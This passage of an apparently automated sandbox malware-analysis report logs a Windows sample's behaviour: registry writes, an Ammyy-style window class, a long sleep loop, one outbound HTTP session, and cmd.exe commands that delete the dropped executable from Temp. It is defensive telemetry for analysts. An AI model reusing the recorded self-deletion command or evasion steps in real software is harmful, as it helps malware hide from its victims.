Read Value HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control value_name = netsxuid, data = 53 True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System value_name = EnableLUA, data = 1 True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services value_name = netsxuid, data = 0 False 1
Read Value HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control value_name = netsxuid, data = 53 True 1
Write Value HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control value_name = netsxuid, data = 52393308, size = 8, type = REG_SZ True 1
Module (83)
Operation Module Additional Information Success Count Logfile
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Load api-ms-win-core-synch-l1-2-0 base_address = 0x74e40000 True 2
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 4
Load kernel32 base_address = 0x0 False 2
Load kernel32 base_address = 0x75440000 True 3
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 2
Load - base_address = 0x0 False 2
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 4
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x775d0000 True 1
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\programdata\settings\wsus.exe, file_name_orig = C:\ProgramData\Settings\wsus.exe, size = 260 True 1
Get Filename - process_name = c:\programdata\settings\wsus.exe, file_name_orig = C:\ProgramData\Settings\wsus.exe, size = 260 True 1
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75454f2b True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75454208 True 3
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75451252 True 3
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x754d47f1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7545359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75454d28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitOnceExecuteOnce, address_out = 0x7546d627 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x754d410b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7546ca5a True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x754d4195 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7546ee7e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7546f088 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x754ccd11 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7546eee0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleEx, address_out = 0x7546c78f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandle, address_out = 0x7547cbfc True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimePreciseAsFileTime, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeConditionVariable, address_out = 0x77608456 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WakeConditionVariable, address_out = 0x77677de4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WakeAllConditionVariable, address_out = 0x7763409d True 2
Get Address c:\windows\syswow64\kernel32.dll function = SleepConditionVariableCS, address_out = 0x754d4b32 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSRWLock, address_out = 0x77608456 True 1
Get Address c:\windows\syswow64\kernel32.dll function = AcquireSRWLockExclusive, address_out = 0x776029f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TryAcquireSRWLockExclusive, address_out = 0x77614892 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseSRWLockExclusive, address_out = 0x776029ab True 1
Get Address c:\windows\syswow64\kernel32.dll function = SleepConditionVariableSRW, address_out = 0x754d4b74 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWork, address_out = 0x7546ee45 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SubmitThreadpoolWork, address_out = 0x77648491 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWork, address_out = 0x7763d8e2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x754d46b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x754d4751 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x754d3f49 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ProcessIdToSessionId, address_out = 0x75451275 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceFrequency, address_out = 0x754541f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75451725 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsBadCodePtr, address_out = 0x75472b34 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlGetVersion, address_out = 0x7760873a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x754610b5 True 1
Window (250)
Operation Window Name Additional Information Success Count Logfile
Create - class_name = AmmyyAdminTarget3, wndproc_parameter = 0 True 1
Find - class_name = fdsfds False 249
System (2326)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = EXB9WSP True 1
Sleep duration = 100 milliseconds (0.100 seconds) True 2314
Sleep duration = 50 milliseconds (0.050 seconds) True 2
Get Time type = System Time, time = 1627-02-02 21:37:23 (UTC) True 1
Get Time type = Ticks, time = 10941676 True 1
Get Time type = Ticks, time = 10941878 True 3
Get Time type = Ticks, time = 10941941 True 1
Get Info type = Operating System True 1
Get Info type = Operating System False 1
Get Info type = Hardware Information True 1
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Network Behavior
TCP Sessions (1)
Information Value
Total Data Sent 169 bytes
Total Data Received 3 bytes
Contacted Host Count 1
Contacted Hosts
TCP Session #1
Information Value
Handle 0xf0
Address Family AF_INET
Remote Address
Remote Port 80
Local Address
Local Port 49167
Data Sent 169 bytes
Data Received 3 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address =, remote_port = 80 True 1
Send flags = NO_FLAG_SET, size = 36, size_out = 36 True 1
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Send flags = NO_FLAG_SET, size = 131, size_out = 131 True 1
Send flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Process #22: cmd.exe
59 0
Information Value
ID #22
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:28, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:10
OS Process Information
Information Value
PID 0xa60
Parent PID 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A70
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x005bffff Private Memory Readable, Writable True False False -
private_0x00000000006f0000 0x006f0000 0x006fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000700000 0x00700000 0x00887fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000890000 0x00890000 0x00a10fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a20000 0x00a20000 0x01e1ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e20000 0x01e20000 0x02162fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a7d0000 0x4a81bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x750d0000 0x750d6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (23)
Operation Filename Additional Information Success Count Logfile
Create NUL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 2
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe type = file_attributes True 2
Get Info C:\Users\QJ4SUK~1\AppData\Local\Temp type = file_attributes True 1
Delete C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe - True 1
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a7d0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x7546a84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75473b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75454a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7546a79d True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-06 09:52:21 (UTC) True 1
Get Time type = Ticks, time = 10940630 True 1
Environment (9)
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Get Environment String name = PROMPT, result_out = $P$G True 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = =C:, value = C:\Users\qj4SUKboE\Desktop True 1
Process #23: cmd.exe
63 0
Information Value
ID #23
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:28, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:10
OS Process Information
Information Value
PID 0xa80
Parent PID 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A90
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x005dffff Private Memory Readable, Writable True False False -
private_0x0000000000760000 0x00760000 0x0085ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000860000 0x00860000 0x009e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009f0000 0x009f0000 0x00b70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b80000 0x00b80000 0x01f7ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001f80000 0x01f80000 0x022c2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a7d0000 0x4a81bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x750c0000 0x750c6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (27)
Operation Filename Additional Information Success Count Logfile
Create NUL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 2
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe type = file_attributes False 2
Get Info C:\Users\QJ4SUK~1\AppData\Local\Temp type = file_attributes True 1
Get Info STD_ERROR_HANDLE type = file_type True 1
Write STD_ERROR_HANDLE size = 62 True 1
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a7d0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x7546a84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75473b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75454a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7546a79d True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-06 09:52:21 (UTC) True 1
Get Time type = Ticks, time = 10940818 True 1
Environment (9)
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Get Environment String name = PROMPT, result_out = $P$G True 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = =C:, value = C:\Users\qj4SUKboE\Desktop True 1
Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
